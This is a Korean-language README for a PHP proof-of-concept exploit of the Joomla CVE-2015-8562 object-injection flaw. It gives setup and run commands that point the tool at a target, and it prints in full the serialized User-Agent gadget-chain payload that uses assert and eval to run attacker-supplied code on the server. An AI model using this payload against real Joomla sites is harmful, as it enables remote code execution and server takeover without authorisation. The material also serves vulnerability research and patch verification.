
Joomla의 CVE-2015-8562 취약점에 대한 개념 증명(PoC)
Joomla CVE-2015-8562 취약점에 대한 개념 증명
이 PoC는 Gary가 exploit-db에 호스팅한 Python 구현을 거의 1:1로 복사한 것입니다.
설치는 매우 쉽습니다:
git clone https://github.com/RobinHoutevelts/Joomla-CVE-2015-8562-PHP-POC.git
cd Joomla-CVE-2015-8562-PHP-POC
composer install
Composer가 모든 것을 설치하면 exploit.php에서 $target을 변경해야 합니다.
그 후에 바로 사용할 수 있습니다:
php exploit.php
2015년 12월, Joomla에서 취약점이 발견되었습니다. 이 취약점을 통해 원격 공격자는 HTTP User-Agent 헤더를 통해 PHP 객체 주입 공격을 수행하고 임의의 PHP 코드를 실행할 수 있습니다.
이 취약점은 Joomla의 모든 버전에 영향을 미쳤습니다. v1.5.x, v2.5x 및 v3.x에 대한 패치는 이미 출시되었습니다.
PHP >= 5.4.45, >= 5.5.29 또는 >= 5.6.13을 실행 중이라면 이 익스플로잇이 CVE-2015-6835도 활용하므로 안전합니다.
PatrolServer의 Nikos Verschore는 매우 상세한 블로그 게시물을 작성했으며, 이 취약점을 이해하는 데 큰 도움이 되었습니다. 그들의 미니 스캐너를 무료로 사용하여 사이트가 위험에 처했는지 확인할 수 있습니다.
보내는 User-Agent 헤더는 다음과 같습니다:
jklmj}__jklmjklmjk|O:21:"JDatabaseDriverMysqli":3:{
s:4:"\0\0\0a";
O:17:"JSimplepieFactory":0:{}
s:21:"\0\0\0disconnectHandlers";
a:1:{
i:0;
a:2:{
i:0;
O:9:"SimplePie":5:{
s:8:"sanitize";
O:20:"JDatabaseDriverMysql":0:{}
s:5:"cache";
b:1;
s:19:"cache_name_function";
s:6:"assert";
s:10:"javascript";
i:9999;
s:8:"feed_url";
s:62:"eval('base64_decode($_POST[111])');JFactory::getConfig();exit;";
}
i:1;
s:4:"init";
}
}
s:13:"\0\0\0connection";
i:1;
}